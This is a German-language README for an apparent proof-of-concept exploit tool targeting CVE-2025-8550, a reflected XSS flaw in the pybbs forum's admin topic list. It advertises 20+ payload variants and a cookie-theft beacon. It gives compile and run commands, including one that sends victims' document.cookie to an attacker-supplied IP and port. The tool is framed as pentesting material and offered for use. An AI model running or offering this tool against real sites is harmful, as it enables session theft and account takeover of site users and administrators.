
Automatisierter Proof-of-Concept-Exploit für CVE-2025-8550, ein reflektierter XSS in atjiu pybbs. Bietet 20+ Payload-Varianten, Cookie-Exfiltration, Multithreading und anpassbare CLI für Penetrationstests.
Dieses Repository enthält einen automatisierten Proof-of-Concept (PoC)-Exploit für CVE-2025-8550, eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke in atjiu pybbs (≤ v6.0.0). Er zielt auf den Endpunkt /admin/topic/list des Parameters username ab, dem eine ordnungsgemäße Eingabebereinigung fehlt.
20+ Payload-Variationen: script, SVG, iframe, object, onerror-Handler und mehr.
Automatische URL-Kodierung: gewährleistet sichere Injektion über libcurl's curl_easy_escape.
Cookie-Exfiltration (Optional): Beacon-Injektion zum Senden von document.cookie an einen angreiferkontrollierten Server.
Multithreading: verwendet pthreads, um Versuche zu parallelisieren und Tests zu beschleunigen.
Anpassbare CLI: unterstützt durch argparse, ermöglicht die Angabe von:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> durch Ihre Instanz von atjiu pybbs.-k, um den Cookie-Diebstahl-Beacon zu aktivieren (erfordert -i und -p).-c weg, wenn keine Authentifizierungs-Cookies benötigt werden.MIT License